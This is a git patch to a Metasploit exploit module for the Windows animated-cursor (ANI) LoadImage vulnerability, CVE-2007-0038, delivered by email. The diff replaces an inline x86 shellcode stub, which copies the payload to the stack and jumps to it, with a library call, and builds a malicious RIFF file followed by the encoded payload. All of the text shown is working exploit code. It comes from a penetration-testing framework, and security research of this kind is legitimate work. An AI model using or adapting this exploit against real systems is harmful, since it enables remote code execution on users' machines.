From e2029b9d9c2a62018791180b667b0c89220e69d7 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Mon, 2 Apr 2007 05:54:44 +0000 Subject: [PATCH] Merged in copy_to_stack feature from HTTP exploit git-svn-id: file:///home/svn/framework3/trunk@4614 4d416f70-5f16-0410-b530-b9f4589650da --- .../windows/email/ani_loadimage_chunksize.rb | 27 +++++++++---------- 1 file changed, 12 insertions(+), 15 deletions(-) diff --git a/modules/exploits/windows/email/ani_loadimage_chunksize.rb b/modules/exploits/windows/email/ani_loadimage_chunksize.rb index 8b3f44836b..e0aeeae70e 100644 --- a/modules/exploits/windows/email/ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/email/ani_loadimage_chunksize.rb @@ -280,22 +280,19 @@ class Exploits::Windows::Email::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 4].pack('V') end - # Our ANI file is randomly placed into a read-only segment, the only reliable - # solution is to copy our payload back to the stack and execute it there. This - # is non-optimal and should be replaced soon. - copier = - "\xeb\x0f"+ # jmp _end - "\x68\x00\x04\x00\x00"+ # push 1024 - "\x59"+ # pop ecx - "\x5e"+ # pop esi - "\x29\xcc"+ # sub esp, ecx - "\x89\xe7"+ # mov edi, esp - "\xf3\xa4"+ # rep movsb - "\xff\xe4"+ # jmp esp - "\xe8\xec\xff\xff\xff" # call _start - # Place the RIFF chunk in front and off we go - ret = "RIFF" + [riff.length].pack('V') + riff + copier + payload.encoded + ret = "RIFF" + [riff.length].pack('V') + riff + + # We copy the encoded payload to the stack because sometimes the RIFF + # image is mapped in read-only pages. This would prevent in-place + # decoders from working, and we can't have that. + ret << Rex::Arch::X86.copy_to_stack(payload.encoded.length) + + # Place the real payload right after it. + ret << payload.encoded + + ret + end # Generates a riff chunk with the first bytes of the data being a relative